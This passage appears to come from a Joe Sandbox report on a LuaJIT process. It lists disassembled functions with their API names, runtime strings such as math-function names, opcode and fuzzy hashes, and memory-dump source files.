                                                                                                                                                                        • Instruction ID: 6beb90e00563560a9594fabdd057d87759122efcbc92cff599e06aff502d33c5
                                                                                                                                                                        • Opcode Fuzzy Hash: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                                                                                                                                        • Instruction Fuzzy Hash: 7751B533A0A642A7DB14EB15E424F2AF755FB44B84F908030DA1E87788EF7EE945D718
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID: !$acos
                                                                                                                                                                        • API String ID: 1156100317-2870037509
                                                                                                                                                                        • Opcode ID: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                                                                                                                                        • Instruction ID: d973efedbfeb8ec480fc9cd31820c0e4e0a3277d40b768547522a69349175e0c
                                                                                                                                                                        • Opcode Fuzzy Hash: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 0161F723C1EF8A9AE223EF345810676E754AF96380F509333E91E31964DF3DE042A615
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID: !$asin
                                                                                                                                                                        • API String ID: 1156100317-2188059690
                                                                                                                                                                        • Opcode ID: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                                                                                                                                        • Instruction ID: 6dcb9db1c7eb2c38a208d945e27ade1fa1c22abfc2489b024d5396aef543bcb9
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E51DA23D29F8A96E213DB349C10676E354BF96380F919337ED5E31960DF3EA0829619
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_nolock
                                                                                                                                                                        • String ID: luaJIT_BC_%s$luaopen_%s$path too long
                                                                                                                                                                        • API String ID: 2882679554-1241789697
                                                                                                                                                                        • Opcode ID: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                                                                                                                                        • Instruction ID: 7c33dffff9e3f266d9bfa4e42ae45ab3b10bedc4de8f3fe3258d6a2e14971857
                                                                                                                                                                        • Opcode Fuzzy Hash: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                                                                                                                                        • Instruction Fuzzy Hash: 26515133A1DB4591E620AB55E44076EE7A1FBC4BD0F900532FA8D43BA9DF3ED440AB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 72036449-0
                                                                                                                                                                        • Opcode ID: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                                                                                                                                        • Instruction ID: 9479bb229d7b9ae2e3ccb61f6e3ae6275930d112e0bcf46ce911c81ef105a1b5
                                                                                                                                                                        • Opcode Fuzzy Hash: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                                                                                                                                        • Instruction Fuzzy Hash: EF51F123F1CA1362F7686928840137EE982DB00714F996035CA1D8E2D5EE3FE940B66B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Context$CaptureEntryFunctionLookupRestoreUnwindVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3461063567-0
                                                                                                                                                                        • Opcode ID: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                                                                                                                                        • Instruction ID: 73853a914469b2ac945d9baf55c89a44e3aab90671b41f8b4ad17e251a3bf150
                                                                                                                                                                        • Opcode Fuzzy Hash: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                                                                                                                                        • Instruction Fuzzy Hash: AC310636919BC595EA609B11E4547AAF3A1F7C9780F900036D68D43B68DF7ED058DB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2321548817-0
                                                                                                                                                                        • Opcode ID: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                                                                                                                                        • Instruction ID: edbbd3b6524eb6167052c9ce62c2a54b77d80ddeade5a6f238bb4d042901ec98
                                                                                                                                                                        • Opcode Fuzzy Hash: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                                                                                                                                        • Instruction Fuzzy Hash: 9211A823A0928392FA507F2AD41027DE291AF45FF0F944230D92D4B6D4DF3DF442A72A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-3916222277
                                                                                                                                                                        • Opcode ID: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                                                                                                                                        • Instruction ID: 879129e1f5d155a8a003e5bbdecbade028672895b9baf67089e22540880ab42d
                                                                                                                                                                        • Opcode Fuzzy Hash: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E61A97390F91296E768AF24C08477CF7A9EB01B08F941577C64A42195CF3AF681E729
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-3916222277
                                                                                                                                                                        • Opcode ID: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                                                                                                                                        • Instruction ID: 67c956dc313070c9bf3d94ed88f9c7d00345f189aeb6980dcf78ae0d02dd753d
                                                                                                                                                                        • Opcode Fuzzy Hash: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                                                                                                                                        • Instruction Fuzzy Hash: C961C97391F61296E764AF28E05447CF7A6FB05B09F941537D60A02A94CF3EF441EB28
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-3916222277
                                                                                                                                                                        • Opcode ID: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                                                                                                                                        • Instruction ID: fb4f9348224896e507c3ebbe22a88d9da312a07cce9d951c7d1ecdbbcb2d2009
                                                                                                                                                                        • Opcode Fuzzy Hash: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                                                                                                                                        • Instruction Fuzzy Hash: 20619A7390A202A6EB64BF28E044B7CF7A5EB15B48F941537C60A461D5CF3EF441EB29
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-3916222277
                                                                                                                                                                        • Opcode ID: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                                                                                                                                        • Instruction ID: 0b096650e6259102d6c190ca1b466d150725cfad95fffd5d706de7c290dc9a58
                                                                                                                                                                        • Opcode Fuzzy Hash: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                                                                                                                                        • Instruction Fuzzy Hash: EB51D93390A60296E764AF24E0447BCF7A0FB05B18F941937C61A42295CF7AF485F729
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                        • API String ID: 3215553584-3030954782
                                                                                                                                                                        • Opcode ID: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                                                                                                                                        • Instruction ID: 5546bdf4d42cf1aaf481a6c8e5f2deb4c51dd1eb00fa810bc668c9fd5a0c8731
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                                                                                                                                        • Instruction Fuzzy Hash: EE5137A3B186C656E7249F25984076DEB91EB80B94F888231C7A847BD5CF3EE044D716
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _handle_error
                                                                                                                                                                        • String ID: !$fmod
                                                                                                                                                                        • API String ID: 1757819995-3213614193
                                                                                                                                                                        • Opcode ID: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                                                                                                                                        • Instruction ID: 2cc7d87770c839878763ab735def0352bdae01b8be61180d0cda9dcc8185733f
                                                                                                                                                                        • Opcode Fuzzy Hash: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                                                                                                                                        • Instruction Fuzzy Hash: 4851EB53D2DBCB99E16367319011BB5EA98AF623C0F809332ED5D355A1DF3E6003621A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::rsfun
                                                                                                                                                                        • String ID: $$type parameter
                                                                                                                                                                        • API String ID: 3764944385-1705267328
                                                                                                                                                                        • Opcode ID: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                                                                                                                                        • Instruction ID: 2205bc6b185030c5fec3cf71058c9e8f2bdb5551c46cba48f1cd835f1ca79d7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F513B37619B8586DB60DF4AE48022EF7A0F7C8BA4F544622EE9D877A4CF7DD4409B04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                        • String ID: U
                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                        • Opcode ID: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                                                                                                                                        • Instruction ID: d6d1d784e252a5e4fb849e791c06414145199b6faff10d87ea68403a0c52faea
                                                                                                                                                                        • Opcode Fuzzy Hash: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                                                                                                                                        • Instruction Fuzzy Hash: 7041F063B18A8292DB20EF25E4547AAE7A0FB887C0F844031EE4D87798DF3DD405D766
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _handle_error
                                                                                                                                                                        • String ID: "$pow
                                                                                                                                                                        • API String ID: 1757819995-713443511
                                                                                                                                                                        • Opcode ID: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                                                                                                                                        • Instruction ID: c0394b19fccd47fd856fc83e10b608f9496c05e082fb63f67ff091526a43bf3f
                                                                                                                                                                        • Opcode Fuzzy Hash: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                                                                                                                                        • Instruction Fuzzy Hash: 492186B3D1CAC597E770DF10E040A6BF6A0FBDA344F501325F29906A94CB7DD0419B16
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
